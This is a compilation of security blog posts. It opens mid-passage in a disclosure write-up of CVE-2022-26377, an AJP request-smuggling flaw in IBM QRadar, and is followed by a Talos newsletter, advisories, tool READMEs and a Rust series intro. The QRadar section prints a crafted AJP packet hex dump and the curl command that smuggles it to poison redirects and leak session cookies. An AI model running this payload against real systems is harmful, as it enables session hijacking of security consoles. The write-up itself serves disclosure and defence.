Expires: Sun, 24 Mar 2024 02:12:13 GMT
X-Frame-Options: SAMEORIGIN

Using tcpdump, we can observe that our single HTTP request has indeed resulted in two AJP request packets being sent to the AJP backend. The two requests are as followed

  • The legitimate AJP request triggered by our initial HTTP request, and,
  • The smuggled request

Put simply - this makes a lot of sense - we’re definitely smuggling a request here.

At this point, we were much more interested in the varying in response status codes - what is going on here?

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Let’s take stock of what we’re observing:

  • One HTTP request results in two AJP Packets being sent to the backend
  • Somehow, HTTP Responses are being returned out of sync

Our first point is enough to arrive at the conclusion that we’ve found an instance of CVE-2022-26377. The (at the time of performing our research) up-to-date version of QRadar (7.5.0 UP7) is definitely vulnerable, since a single HTTP request can smuggle an additional AJP packet.

Our journey doesn’t end here, though. It never does.

Bugs are fun, but to assess real-world impact, we need to dive into how this can be exploited by a threat actor and determine the real risk.

Godzilla Vs Golliath(?)

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

So, the big question - we've confirmed CVE-2022-26377 it seems and excitingly we can now split one HTTP request into 2 AJP requests. But, zzz - how is CVE-2022-26377 actually exploitable in the context of QRadar?

In the previous real-world example of CVE-2022-26377 being exploited against F5, AJP packets were being parsed by additional Java functionality, which allowed authentication to be bypassed via the smuggled AJP packet with additional values injected into it.

We spent some time diving through the console application exposed by IBM QRadar, looking for scenarios similar to the F5. However, we come up short on functionality to escalate our level of authentication via just a single injected AJP packet.

Slightly exasperated by this, our next course of action can be expressed via the following quote, taken from the developers of the original F5 BigIP vulnerability researchers:

We then leveraged our advanced pentesting skills and re-ran the curl command several times, because sometimes vulnerability research is doing the same thing multiple times and somehow getting different results

As much as we like to believe that computers are magic - we have been informed via TikTok that this is not the case, and something more mundane is happening here. We noticed the application began to β€˜break’, and responses were, in fact, unsynchronized. While this sounds strange - this is a relatively common artefact around request smuggling-class vulnerabilities.

When we say β€˜desynchronized’, we mean that the normal β€œcause-and-effect” flow of a web application, or the HTTP protocol, no longer applies.

Usually, there is a very simple flow to web requests - the user makes a request, and the server issues a corresponding response. Even if two users make requests simultaneously, the server keeps the requests separate, keeping them neatly queued up and ensuring the correct user only ever sees responses for the requests they have issued. Soemthing about the magic of TCP.

However, in the case of QRadar, since a single HTTP request results in two AJP requests, we are generating an imbalance in the number of responses created. This confuses things, and as the response queue is out of sync with the request queue, the server may erraneously respond with a response intended for an entirely different user.

This is known as aΒ DeSync Attack, for which there is some amount of public research in the context of HTTP, but relatively little concerning AJP.

But, how can we abuse this in the context of IBM's QRadar?

Anyway, tangent time

Well, where would life be without some random vulnerabilities that we find along the way?

When making a request to the console application with a doctored HTTP request 'Host' header, we can observe that QRadar trusts this value and uses it to construct values used within the Location HTTP response header - commonly known as a Host Header Injection vulnerability. Fairly common, but for the sake of completeness - here’s a request and response to show the issue:

Request:

GET /console/watchtowr HTTP/1.1
Host: watchtowr.com

Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:16:55 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=74779EA7C7827A53BD474F884657CDA6; Path=/; Secure; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: <https://watchtowr.com:443/console/logon.jsp?loadback=76edfcc6-4a57-496e-a03c-ea2e8a50ffb6>
Content-Length: 0
X-Frame-Options: SAMEORIGIN

It’s a very minor vulnerability, if you could even call it that - in practice, what good is a redirect that requires modification of the Host HTTP request header in a request sent by the victim? In almost all cases imaginable, this is completely useless.

Is this one of the vanishingly uncommon instances where it is useful?

Well, well, well…

Typically, with vulnerabilities that involve poisoning of responses, we have to look for gadgets to chain them with to escalate the magnitude of an attack - tl;dr what can we do to demonstrate impact.

Can we take something harmless, and make it harmful? Perhaps we can take the β€˜useless’ Host Header Injection β€˜vulnerability’ discussed above, and turn it into something fruitful.

It turns out, by formatting this Host Header Injection request into an AJP forwarding packet and sending it to the QRadar instance using our AJP smuggling technique, we can turn it into a site-wide exploit - hitting any user that is lucky(!) enough to be using QRadar.

Groan..

Below is a correctly formatted AJP Forward Request packet (note the use of B’s to correctly pad the packet out to the correct size). This AJP packet emulates a HTTP request leveraging the Host Header Injection discussed above.

We will smuggle this packet in, and observe the result. Once the queues are desynchronised, the response will be served to other users of the application, and since we control the Location response header, we can cause the unsuspecting user to be redirected to a host of our choosing.

00000000: 0008 4854 5450 2f31 2e31 0000 0b2f 636f  ..HTTP/1.1.../co
00000010: 6e73 6f6c 652f 7878 0000 0931 3237 2e30  nsole/xx...127.0
00000020: 2e30 2e31 0000 026c 6f00 0007 6c6f 6361  .0.1...lo...loca
00000030: 6c78 7400 0050 0000 0300 0154 0000 2042  lxt..P.....T.. B
00000040: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000050: 4242 4242 4242 4242 4242 4242 4242 4200  BBBBBBBBBBBBBBB.
00000060: 000a 5741 5443 4854 4f57 5230 0000 0130  ..WATCHTOWR0...0
00000070: 00a0 0b00 0d77 6174 6368 746f 7772 2e63  .....watchtowr.c
00000080: 6f6d 0003 0062 6262 6262 0005 0162 6262  om...bbbbb...bbb
00000090: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000f0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000100: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000110: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000120: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000130: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000140: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000150: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000160: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000170: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000180: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000190: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001f0: 6262 6262 6262 6262 6262 6262 6265 3d00  bbbbbbbbbbbbbe=.
00000200: ff00
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \\
		--data-binary @payload.txt

Poisoned Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:35:06 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Set-Cookie: JSESSIONID=E3D8AB1D2D6B3267BE9FB3BF3FFAD9C0; Path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: <http://watchtowr.com:80/console/logon.jsp?loadback=44d7c786-522d-4bc2-90be-f1eac249da3c>
Content-Length: 0
X-Frame-Options: SAMEORIGIN

What are we seeing here?

Well, after a few attempts, the server has started to serve the poisoned response to other users of the application - even authenticated users - to be redirected via the Location we control.

This is a clear case of CVE-2022-26377 in an exploitable manner; we can redirect all application users to an external host. Exploitation of this by a threat actor is only limited by their imagination; we can easily conjure up a likely attack scenario.

Picture a Blue Team operator logging in to their favourite QRadar instance after receiving a few of their favourite alerts, warning them of potential ransomware being deployed across their favourite infrastructure. Imagine them desperately looking for their favourite β€˜patient zero’ and hoping to nip their favourite threat actors' campaign in the bud.

While navigating through their dashboards, however, an attacker uses this vulnerability to silently redirect them to a β€˜fake’ QRadar instance, mirroring their own instance - but instead of those all-important alerts - all is quiet in this facade QRadar instance, and nothing is reported.

The poor Blue Team Operator goes for their lunch, confident there is no crisis - while in reality, their domain is compromised with malicious GPOs carrying the latest cryptolocker malware.

Before they even realise what's going on, it's too late; the damage is done.

In case you need a little more convincing, here’s a short video clip of the exploit taking place:

Proof of Concept

At watchTowr, we no longer publish Proof of Concepts. We heard the tweets, we heard the comments - we were making it too easy for defensive teams to build detection artefacts for these vulnerabilities contextualised to their environment.

So instead, we've decided to do something better - that's right! We're proud to release the first of many to come of our Python-based, dynamic detection artefact generator tools.

https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc

DeSync Responses

So, we'vee shown a pretty scary exploitation scenario - but it turns out we can take things even further if we apply a little creativity (ha ha, who knew that watchTowr ever take things too far 😜).

At this point, the HTTP response queue is in tatters, with authenticated responses being returned to unauthenticated users - that's right, we can leak privileged information from your QRadar SIEM, the heart of your security stack, to unauthenticated users with this vulnerability.

Well, let’s take an extremely brief look into how QRadar handles sessions.

Importantly, in QRadar’s design, each user's session values need to be refreshed relatively often - every few minutes. This is a security mechanism designed to expire values quickly, in case they are inadvertently exposed. Ironically however, we can use these as a powerful exploitation primitive, since they can be returned to unauthenticated users if the response queue is, in technical terms, "rekt". Which, at this point, it is.

Here’s how a session refresh looks:

HTTP/1.1 200 200
Date: Sun, 10 Mar 2024 02:53:34 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=CE0279DC02A0715BB41358EC44A7F546; Path=/; Secure; HttpOnly
Set-Cookie: QRadarCSRF=083a2ebb-7d42-4e56-b4a9-728843f6958e; Path=/; Secure
Set-Cookie: AJAXTimeoutLimit=5; Path=/; Secure
Set-Cookie: SEC=03de6b43-8454-469a-8d40-076f6d12a13d; Path=/; Secure; HttpOnly
Set-Cookie: inactivityTimeout=30; Path=/; Secure
Set-Cookie: lastClickTime=2024-03-10T02:53Z; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Length: 1045
Connection: close

If the above isn't sufficiently clear, the session credentials for authenticated users are returned in an HTTP response (if this is not obvious) and thus in the context ofΒ  this vulnerability, these same values would be returned to unauthenticated users.

If you follow our leading words, this would allow threat actors (or watchTowr's automation) to assume the session of the user and take control of their QRadar SIEM instance in a single request.Β 

Flagship security software from IBM.

Once again, exploitation is in the hands of creative threat actors; how could this be further exploited in a real-world attack?

Imagine your first day as the new Blue Team lead in a Fortune 500 organisation; you want to show off to your new employer, demonstrating all the latest threat-hunting techniques.

You’ve got your QRadar instance at hand, you’ve got agent deployment across the organisation, and you have the all-important logs to sort through and subject to your creative rulesets.

You authenticate to QRadar, and hammer away like the pro defender you are. However, a threat actor quietly DeSync’s your instance, and your session data starts to leak. They authenticate to your QRadar instance as if they were you and begin to snoop on your activities.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

A quick peek into the ingested raw logs reveals cleartext Active Directory credentials submitted by service accounts across the board. Whose hunting who now?

The threat actors campaign is just beginning, and the race to compromise the organisation has started the moment you log into your QRadar. Good job on your first day.

Thanks IBM!

Tl;dr how bad is this

To sum up the impact the vulnerability has, in the context of QRadar, from an un-authenticated perspective:

  • An unauthenticated attacker gains the ability to poison responses of authenticated users
  • An unauthenticated attacker gains the ability to redirect users to an external domain:
    • For example, the external domain could imitate the QRadar instance in a Phishing attack to garner cleartext credentials
  • An unauthenticated attacker gains the ability to cause a Denial-Of-Service in the QRadar instance and interrupt ongoing security operations
  • An unauthenticated attacker gains the ability to retrieve responses of authenticated users
    • Observe ongoing security operations
    • Extract logs from endpoints and devices feeding data to the QRadar instance
    • Obtain session data from authenticated users and administrators and authenticate with this data.

Conclusion

Hopefully, this post has shown you that as an industry we still cannot even do the basics - let alone a listed, too-big-to-fail technology vendor.

While there will be a continuation of evolution of threats that compound our timelines and day-jobs, and state-sponsored actors trying to slip backdoors into OpenSSH - it doesn't mean we ignore the.. very basics.

To see such an omission from a vendor of security software, in their flagship security product - in our opinion, this is disappointing.

Usual advice applies - patch, pray that IBM now know to update dependencies, see what happens next time.

AtΒ watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about theΒ watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Timeline

Date Detail
3rd January 2024 Vulnerability discovered
17th January 2024 Vulnerabilities disclosed to IBM PSIRT
17th January 2024 IBM responds and assigned the internal tracking references β€œADV0108871”
25th January 2024 watchTowr hunts through client's attack surfaces for impacted systems, and communicates with those affected
26th March 2024 IBM issues a security bulletin and utilising the identifiers CVE-2022-26377 - https://www.ibm.com/support/pages/node/7145265
12th April 2024 Blogpost and PoC released to public

The internet is already scary enough without April Fool’s jokes

11 April 2024 at 18:00
The internet is already scary enough without April Fool’s jokes

I feel like over the past several years, the β€œholiday” that is April Fool’s Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you’d find on a news site any day of the week.Β 

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it’s in β€œcelebration” of a β€œholiday.” 

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games.Β 

But at least from what I saw on April 1 of this year, no one tried to β€œget” anyone with an April Fool’s joke about a ransomware actor requesting payment in the form of β€œFortnite” in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (which, as it turns out, smart pillows exist!).Β Β 

We’re already dealing with digitally manipulated photos of β€œSatanic McDonalds,” Twitter’s AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos and more that I hesitate to even make up.Β 

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.Β Β 

The one big thingΒ 

Talos discovered a new threat actor we’re calling β€œCoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exeΒ 

Why do I care?Β 

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country who is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets’ social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account.Β 

So now what?Β 

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don’t know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default β€” macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here.Β 

Top security headlines of the weekΒ 

The security community is still reflecting on the β€œWhat If” of the XZ backdoor that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly on accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user’s SSH connection and secretly run their own code on that user’s machine. The incident is highlighting networking’s reliance on open-source projects, which are often provided little resource and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters)Β 

AT&T now says that more than 51 million users were affected by a data breach that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as β€œMajorNelson.” AT&T’s notification to affected customers stated that, "The [exposed] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information were related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch)Β 

Another ransomware group claims they’ve stolen data from United HealthCare, though there is little evidence yet to prove their claim. Change Health, a subsidiary of United, was recently hit with a massive data breach, pausing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters)Β 

Can’t get enough Talos?Β 

Upcoming events where you can find TalosΒ 

Botconf (April 23 - 26)Β 

Nice, CΓ΄te d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3)Β 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9)Β 

San Francisco, CaliforniaΒ Β Β Β 

Most prevalent malware files from Talos telemetry over the past weekΒ 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0
MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

SHA 256: abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6
MD5: 22ae85259273bc4ea419584293eda886
Typical Filename: KMSAuto++ x64.exe
Claimed Product: KMSAuto++
Detection Name: W32.File.MalParent

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Kmsauto::1201

SHA 256: b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31
MD5: 2fb86be791b4bb4389e55df0fec04eb7
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: W32.File.MalParent

SHA 256: 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681
MD5: f1fe671bcefd4630e5ed8b87c9283534
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Hackkms::1201

Are you ready for the CCNA exam? Test yourself with these questions | Cyber Work Hacks

By: Infosec
11 April 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CCNA exam! For today’s Hack, Wilfredo Lanz, Infosec bootcamp instructor in charge of Cisco’s CCNA certification, walks us through four sample CCNA questions, walking through each answer and discounting the wrong ones with explanations, allowing you to reach the right answer in a logical and stress-free way. And the only way you’re going to see it is by staying right here for this Cyber Work Hack!

0:00 - CCNA exam sample questions
1:31 - Different types of CCNA exam questions
3:34 - First CCNA exam sample question
8:34 - Second CCNA exam sample question
13:52 - Third CCNA exam sample question
20:47 - Fourth CCNA exam sample question
25:22 - Infosec CCNA boot camp practice exam
27:04 - Advice for CCNA exam day
28:46 - Outro

Learn more about the CCNA: https://www.infosecinstitute.com/training/ccna/

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

πŸ’Ύ

APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R
11 April 2024 at 12:30


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at



Rust for C Developers Part 0: Introduction

By: wumb0
10 April 2024 at 17:37

Hello! It's been a while. Life has been very busy in the past few years, and I haven't posted as much as I've intended to. Isn't that how these things always go? I've got a bit of time to breathe, so I'm going to attempt to start a weekly(ish) blog series inspired by my friend scuzz3y. This series is going to be about Rust, specifically how to write it if you're coming from a lower level C/C++ background.

When I first learned Rust, I tried to write it like I was writing C. That caused me a lot of pain and suffering at the hands of both the compiler and the unsafe keyword. Since then, I have learned a lot on how to write better Rust code that not only makes more sense, but that is far less painful and requires less unsafe overall. If you already know Rust, hopefully this series teaches you a thing or two that you did not already know. If you're new to Rust, then I hope this gives you a good head start intro transitioning your projects from C/C++ to Rust (or at least to consider it).

I'm going to target this series towards Windows, but many of the concepts can be used on other platforms as well.

Some of the topics I'm going to cover include (in no particular order):

  • Working with raw bytes
  • C structures and types
  • Shellcoding
  • Extended make (cargo-make)
  • Sane error handling
  • Working with native APIs
  • Working with pointers
  • Inline ASM
  • C/C++ interoperability
  • Building python modules
  • Inline ASM and naked functions
  • Testing

If you have suggestions for things you'd like me to write about/cover, shoot me a message at [email protected].

Expect the first post next week. It will be on working with pointers.

Rust for C Developers Part 1: Introduction

By: wumb0
10 April 2024 at 17:37

Hello! It's been a while. Life has been very busy in the past few years, and I haven't posted as much as I've intended to. Isn't that how these things always go? I've got a bit of time to breathe, so I'm going to attempt to start a weekly(ish) blog series inspired by my friend scuzz3y. This series is going to be about Rust, specifically how to write it if you're coming from a lower level C/C++ background.

When I first learned Rust, I tried to write it like I was writing C. That caused me a lot of pain and suffering at the hands of both the compiler and the unsafe keyword. Since then, I have learned a lot on how to write better Rust code that not only makes more sense, but that is far less painful and requires less unsafe overall. If you already know Rust, hopefully this series teaches you a thing or two that you did not already know. If you're new to Rust, then I hope this gives you a good head start intro transitioning your projects from C/C++ to Rust (or at least to consider it).

I'm going to target this series towards Windows, but many of the concepts can be used on other platforms as well.

Some of the topics I'm going to cover include (in no particular order):

  • Working with raw bytes
  • C structures and types
  • Shellcoding
  • Extended make (cargo-make)
  • Sane error handling
  • Working with native APIs
  • Working with pointers
  • Inline ASM
  • C/C++ interoperability
  • Building python modules
  • Inline ASM and naked functions
  • Testing

If you have suggestions for things you'd like me to write about/cover, shoot me a message at [email protected].

Expect the first post next week. It will be on working with pointers.

Vulnerability in some TP-Link routers could lead to factory reset

10 April 2024 at 16:56
Vulnerability in some TP-Link routers could lead to factory reset

Cisco Talos’ Vulnerability Research team has disclosed 10 vulnerabilities over the past three weeks, including four in a line of TP-Link routers, one of which could allow an attacker to reset the devices’ settings back to the factory default.Β 

A popular open-source software for internet-of-things (IoT) and industrial control systems (ICS) networks also contains multiple vulnerabilities that could be used to arbitrarily create new files on the affected systems or overwrite existing ones.Β 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.Β Β 

Denial-of-service, remote code execution vulnerabilities in TP-Link AC1350 routerΒ 

Talos researchers recently discovered four vulnerabilities in the TP-Link AC1350 wireless router. The AC1350 is one of many routers TP-Link produces and is designed to be used on home networks.Β 

TALOS-2023-1861 (CVE-2023-49074) is a denial-of-service vulnerability in the TP-Link Device Debug Protocol (TDDP). An attacker could exploit this vulnerability by sending a series of unauthenticated packets to the router, potentially causing a denial of service and forcing the device to reset to its factory settings.Β Β 

However, the TDDP protocol is only denial of serviceavailable for roughly 15 minutes after a device reboot.Β Β 

The TDDP protocol is also vulnerable to TALOS-2023-1862 (CVE-2023-49134 and CVE-2023-49133), a command execution vulnerability that could allow an attacker to execute arbitrary code on the targeted device.Β 

There is another remote code execution vulnerability, TALOS-2023-1888 (CVE-2023-49912, CVE-2023-49909, CVE-2023-49907, CVE-2023-49908, CVE-2023-49910, CVE-2023-49906, CVE-2023-49913, CVE-2023-49911) that is triggered if an attacker sends an authenticated HTTP request to the targeted device. This exploit includes multiple CVEs because an attacker could overflow multiple buffers to cause this condition.Β 

TALOS-2023-1864 (CVE-2023-48724) also exists in the device’s web interface functionality. An adversary could exploit this vulnerability by sending an unauthenticated HTTP request to the targeted device, thus causing a denial of service.Β 

Multiple vulnerabilities in OAS PlatformΒ 

Discovered by Jared Rittle.Β 

Open Automation Software’s OAS Platform is an IoT gateway and protocol bus. It allows administrators to connect PLCs, devices, databases and custom apps.Β 

There are two vulnerabilities β€” TALOS-2024-1950 (CVE-2024-21870) and TALOS-2024-1951 (CVE-2024-22178) β€” that exist in the platform that can lead to arbitrary file creation or overwrite. An attacker can send a sequence of requests to trigger these vulnerabilities.Β Β 

An adversary could also send a series of requests to exploit TALOS-2024-1948 (CVE-2024-24976), but in this case, the vulnerability leads to a denial of service.Β 

An improper input validation vulnerability (TALOS-2024-1949/CVE-2024-27201) also exists in the OAS Engine User Configuration functionality that could lead to unexpected data in the configuration, including possible decoy usernames that contain characters not usually allowed by the software’s configuration.Β 

Arbitrary write vulnerabilities in AMD graphics driverΒ 

Discovered by Piotr Bania.Β 

There are two out-of-bounds write vulnerabilities in the AMD Radeon user mode driver for DirectX 11. TALOS-2023-1847 and TALOS-2023-1848 could allow an attacker with access to a malformed shader to potentially achieve arbitrary code execution after causing an out-of-bounds write.Β 

AMD graphics drivers are software that allows graphics processing units (GPUs) to communicate with the operating system.Β Β 

These vulnerabilities could be triggered from guest machines running virtualization environments to perform guest-to-host escape. Theoretically, an adversary could also exploit these issues from a web browser. Talos has demonstrated with past, similar, vulnerabilities that they could be triggered from HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host.Β 

RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

By: Zion3R
10 April 2024 at 12:30


This method utilizes TLS callbacks to execute aΒ payloadΒ without spawning any threads in a remote process. This method is inspired byΒ Threadless InjectionΒ as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injectedΒ payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

